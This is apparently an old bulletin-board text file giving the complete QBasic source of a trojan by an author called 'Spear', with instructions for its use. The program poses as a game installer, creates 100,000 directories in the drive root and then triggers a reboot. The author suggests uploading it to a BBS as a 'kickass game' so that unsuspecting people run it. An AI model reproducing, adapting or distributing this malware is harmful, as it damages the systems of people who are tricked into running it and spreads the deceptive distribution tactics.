home *** CD-ROM | disk | FTP | other *** search
- SAMPLE OF A TROJAN
- (from Spear)
-
- This is a little trojan I wrote in Qbasic 4.5 It's a bitch!
-
- REM bitch by Spear
- color 14,0
- print"installing datafiles... Please wait..."
- print"This may take up to 20 minutes, depending on your computer..."
- shell "cd\"
- for a = 1 to 100000
- a$=str$(a)
- c$="md" + a$ + ".hee"
- shell c$
- next a
- cls
- print"Cybermattixx Version 1.0 is now installed on your system..."
- print"Have a shitty day!"
- print " ?AM?"
- print
- input "Hit ENTER To REBOOT your System now!";a$
- shell "boot.com"
-
- How to use it?
- This can pose as the installation program for a game. This means that
- when you upload it to a BBS or something, and post that it is a
- kickass game, people will download it and try to install it on their
- computers!
-
- What does it do?
- This program changes directory to the root and makes 100000 dirs in
- the root. You cannot use deltree to wipe them out in one chunk and
- you CANNOT get rid of them without doing reverse engineering on the
- program, ie. rd instead of md. To get rid of them any other way you
- would have to format c: or d:
-
-